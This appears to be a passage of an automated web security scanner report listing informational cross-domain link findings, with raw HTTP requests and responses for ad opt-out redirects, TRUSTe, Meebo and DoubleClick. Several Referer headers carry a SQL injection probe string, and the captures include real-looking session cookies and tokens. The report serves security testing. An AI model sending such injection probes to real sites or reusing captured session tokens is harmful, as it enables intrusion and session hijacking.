User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _UR=OMW=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110830; TOptOut=1; SRCHD=MS=1949211&SM=1&D=1926637&AF=NOFORM; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; s_vnum=1318708680572%26vn%3D1; s_nr=1316116685620; _FP=

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.atdmt.com/AdvertisementChoice/opt.out?Verify&nocache=0.8079951
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sat, 17 Sep 2011 16:47:00 GMT
Content-Length: 197

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.atdmt.com/AdvertisementChoice/opt.out?Verify&amp;nocache=0.8079951">here</a>.</h2>
</body></html>
18.67. http://choice.bing.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.bing.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?Verify&nocache=0.7795222 HTTP/1.1
Host: choice.bing.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060'%20or%201%3d1--%20=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _UR=OMW=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110830; TOptOut=1; SRCHD=MS=1949211&SM=1&D=1926637&AF=NOFORM; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; s_vnum=1318708680572%26vn%3D1; s_nr=1316116685620; _FP=

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.atdmt.com/AdvertisementChoice/opt.out?Verify&nocache=0.7795222
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sat, 17 Sep 2011 17:37:24 GMT
Content-Length: 197

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.atdmt.com/AdvertisementChoice/opt.out?Verify&amp;nocache=0.7795222">here</a>.</h2>
</body></html>
18.68. http://choice.live.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.live.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?Verify&nocache=0.8079951 HTTP/1.1
Host: choice.live.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TOptOut=1; mkt0=en-US; wlidperf=latency=58&throughput=51; wlxSB=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; wlp=A|TXnt-t:a*e6X4Bg.X_2_Tugboat; drua=9c9838e8e958effe-1; HIC=9c9838e8e958effe|0|218|col102; wla42=cHJveHktYmF5LnB2dC1jb250YWN0cy5tc24uY29tfGJ5Mnxwcm94eS1zbi5wdnQtY29udGFjdHMubXNuLmNvbSoxLEFFM0IxOTM2NUY3RDgzMEEsMSwwLDB8MSw5Qzk4MzhFOEU5NThFRkZFLDEsMiww; LD=4f47dd5a-2037-4ad7-9e5b-fe58c4ec15f4_03fd85b03ef_5707_1316123808235=L37571

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.msn.com/AdvertisementChoice/opt.out?Verify&nocache=0.8079951
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sat, 17 Sep 2011 16:45:50 GMT
Content-Length: 195

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.msn.com/AdvertisementChoice/opt.out?Verify&amp;nocache=0.8079951">here</a>.</h2>
</body></html>
18.69. http://choice.live.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.live.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?optout&nocache=0.1088209 HTTP/1.1
Host: choice.live.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: MUID=360F843730F542A7A6E2E0ACB7BADB9D; wlidperf=throughput=9&latency=342&FR=L&ST=1314473500328; MH=MSFT; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.msn.com/AdvertisementChoice/opt.out?optout&nocache=0.1088209
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: TOptOut=1; domain=.live.com; expires=Sat, 17-Sep-2016 17:19:36 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sat, 17 Sep 2011 17:19:36 GMT
Content-Length: 195

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.msn.com/AdvertisementChoice/opt.out?optout&amp;nocache=0.1088209">here</a>.</h2>
</body></html>
18.70. http://choice.live.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.live.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?VerifyOptOut HTTP/1.1
Host: choice.live.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: MUID=360F843730F542A7A6E2E0ACB7BADB9D; wlidperf=throughput=9&latency=342&FR=L&ST=1314473500328; MH=MSFT; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; TOptOut=1

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://www.networkadvertising.org/optout/opt_success.gif
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sat, 17 Sep 2011 17:21:02 GMT
Content-Length: 173

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/optout/opt_success.gif">here</a>.</h2>
</body></html>
18.71. http://choice.live.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.live.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?Verify&nocache=0.7795222 HTTP/1.1
Host: choice.live.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060%27%20or%201%3d1--%20=1
Cookie: MUID=360F843730F542A7A6E2E0ACB7BADB9D; wlidperf=throughput=9&latency=342&FR=L&ST=1314473500328; MH=MSFT; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.msn.com/AdvertisementChoice/opt.out?Verify&nocache=0.7795222
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sat, 17 Sep 2011 17:09:30 GMT
Content-Length: 195

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.msn.com/AdvertisementChoice/opt.out?Verify&amp;nocache=0.7795222">here</a>.</h2>
</body></html>
18.72. http://choice.microsoft.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.microsoft.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?Verify&nocache=0.8079951 HTTP/1.1
Host: choice.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1; s_vnum=1318713544174%26vn%3D1; s_nr=1316121564287; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\GI002j54F0402h11@03; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801f8bf91; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d02023da9; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/15/2011 16:21:59&Microsoft.VisitStartDate=09/15/2011 16:21:00&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=64&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; mcI=Thu, 22 Sep 2011 21:33:42 GMT; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1316112981254:ss=1316110875219

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sat, 17 Sep 2011 16:47:13 GMT
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>.</h2>
</body></html>
18.73. http://choice.msn.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.msn.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?Verify&nocache=0.8079951 HTTP/1.1
Host: choice.msn.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1162228222-1314847229546; TOptOut=1; MC1=V=3&GUID=5ac4e212f4dc41e28ae541c631a9a2ed; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=53847eaa577b4a27af787123681cd00c&bd=2011-09-15T16:18:14.634&v=2; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; s_vnum=1318873684837%26vn%3D1; MSNTVID=5ac4e212f4dc41e28ae541c631a9a2ed; VWCUKP300=L123100/Q80830_15132_2078_091711_1_093011_489193x482893x091711x1x1; s_nr=1316282718696; mbox=session#1316281807974-204714#1316285017|PC#1316281807974-204714.19#1317492757|check#true#1316283217; Sample=3; zip=c:us

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.bing.com/AdvertisementChoice/opt.out?Verify&nocache=0.8079951
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sat, 17 Sep 2011 16:46:36 GMT
Content-Length: 196

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.bing.com/AdvertisementChoice/opt.out?Verify&amp;nocache=0.8079951">here</a>.</h2>
</body></html>
18.74. http://choice.msn.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.msn.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?Verify&nocache=0.7795222 HTTP/1.1
Host: choice.msn.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060'%20or%201%3d1--%20=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1162228222-1314847229546; TOptOut=1; MC1=V=3&GUID=5ac4e212f4dc41e28ae541c631a9a2ed; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=53847eaa577b4a27af787123681cd00c&bd=2011-09-15T16:18:14.634&v=2; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; s_vnum=1318873684837%26vn%3D1; MSNTVID=5ac4e212f4dc41e28ae541c631a9a2ed; VWCUKP300=L123100/Q80830_15132_2078_091711_1_093011_489193x482893x091711x1x1; s_nr=1316282718696; mbox=session#1316281807974-204714#1316285017|PC#1316281807974-204714.19#1317492757|check#true#1316283217; Sample=3; zip=c:us

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.bing.com/AdvertisementChoice/opt.out?Verify&nocache=0.7795222
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sat, 17 Sep 2011 17:37:25 GMT
Content-Length: 196

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.bing.com/AdvertisementChoice/opt.out?Verify&amp;nocache=0.7795222">here</a>.</h2>
</body></html>
18.75. http://choice.msn.com/AdvertisementChoice/opt.out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choice.msn.com
Path:   /AdvertisementChoice/opt.out

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdvertisementChoice/opt.out?VerifyOptOut HTTP/1.1
Host: choice.msn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: MUID=360F843730F542A7A6E2E0ACB7BADB9D; MC1=V=3&GUID=27de0d4a057a405d855bc5c261d99b62; mh=MSFT; CC=US; Sample=43; CULTURE=EN-US; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; __qca=P0-302102338-1314847295226; VWCUKP300=L123100/Q74127_14103_2078_083111_1_090411_476531x468891x083111x1x1; zip=c:us

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://choice.bing.com/AdvertisementChoice/opt.out?VerifyOptOut
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
P3P: CP=.BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo.
Date: Sat, 17 Sep 2011 17:21:50 GMT
Content-Length: 180

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://choice.bing.com/AdvertisementChoice/opt.out?VerifyOptOut">here</a>.</h2>
</body></html>
18.76. http://choices.truste.com/ca  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ca?pid=adexpose01&aid=adconion01&cid=0511adc728x90&c=adconion01cont3&w=728&h=90&plc=tr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:38:48 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5410
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
<b><a style="color:#456d88;text-decoration:none; display:inline; padding: 0; margin: 0;" href="http://www.adconion.com/us/privacy-policy.html" target="_blank">Adconion</a>
...[SNIP]...
18.77. http://choices.truste.com/ca  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ca?aid=adconion01&pid=adexpose01&cid=0511adc728x90&w=728&h=90&plc=tr&c=adconion01cont3&js=2 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:40:44 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 23519
Connection: keep-alive

truste.ca.addClearAdIcon=function(C){if(!truste.ca[C.baseName+"_bi"]){truste.ca[C.baseName+"_bi"]=C}truste.ca.adTypeMap[C.baseName]=1;
var c=truste.ca.findCreative(C);if(!c){var p=null;if(truste.ca.IE
...[SNIP]...
</span>';
var a="http://choices.truste.com/assets/admarker.swf";var g="77";if(h.cam=="3"||h.cam=="4"){a="http://choices.truste.com/get?name=ad_icon.swf";
g="19"}var e='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash4/cabs/swflash.cab#version=4,0,0,0" id="tecafi" width="'+g+'" height="16" style="position: relative"><param name="flashVars" value="bindingId='+h.baseName+'"/>
...[SNIP]...
<img width="77px" height="15px" src="'+k.icon_cam_mo+'" style="border:none;position:absolute;right:0px;top:0;">';
if(f){i='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash4/cabs/swflash.cab#version=4,0,0,0" id="tecafi" width="58" height="16" style="position: relative"><param name="flashVars" value="bindingId='+k.baseName+'"/>
...[SNIP]...
18.78. http://cim.meebo.com/cim  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cim.meebo.com
Path:   /cim

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cim?iv=4&network=seventeen HTTP/1.1
Host: cim.meebo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie=24214e45185d42f41e74; tcookie=b6f4436ac614b0358d75%26true%26pc2%3D1%26ic10%3D1%26pc4%3D1%26ic18%3D1%26ac17%3D1%26ac16%3D1%26ac14%3D1%26ama_allowed%3Dfalse%26ac18%3D1%26ic22%3D1%26ac2%3D1%26ac5%3D1%26ic17%3D1%26ic23%3D1%26pc5%3D1%26ac8%3D1%26ic13%3D1%26ic5%3D1%26ac20%3D1%26ac10%3D1%26ic3%3D1%26ic12%3D1%26ac19%3D1%26borderless_allowed%3Dfalse%26ic19%3D1%26ic16%3D1%26ac12%3D1%26pc1%3D1%26ic9%3D1%26ic1%3D1%26pts_bk%3D1315097366590

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 16:34:34 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Cache-Control: public, max-age=14400, post-check=28800, pre-check=14400
ETag: 3475976
Vary: User-Agent, Accept-Language
Content-Length: 12150


// Firefox likes to mess with us and swap around / load the wrong contents in iframes.
// Reload the iframe using the src attribute if our code somehow gets swapped into an
// iframe that is not ours
...[SNIP]...
</a>"),
a=a.replace(/#(\w+)/g,"<a style='color: rgb(138, 151, 230); text-decoration:none' target='_blank' href='http://search.twitter.com/search?q=%23$1'>#$1</a>"),
a=a.replace(/@(\w+)/g,"<a style='color: rgb(138, 151, 230); text-decoration:none' target='_blank' href='http://twitter.com/$1'>@$1</a>
...[SNIP]...
18.79. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sat, 17 Sep 2011 16:25:02 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 242
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1">here</A>
...[SNIP]...
18.80. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=exelate&j=0 HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
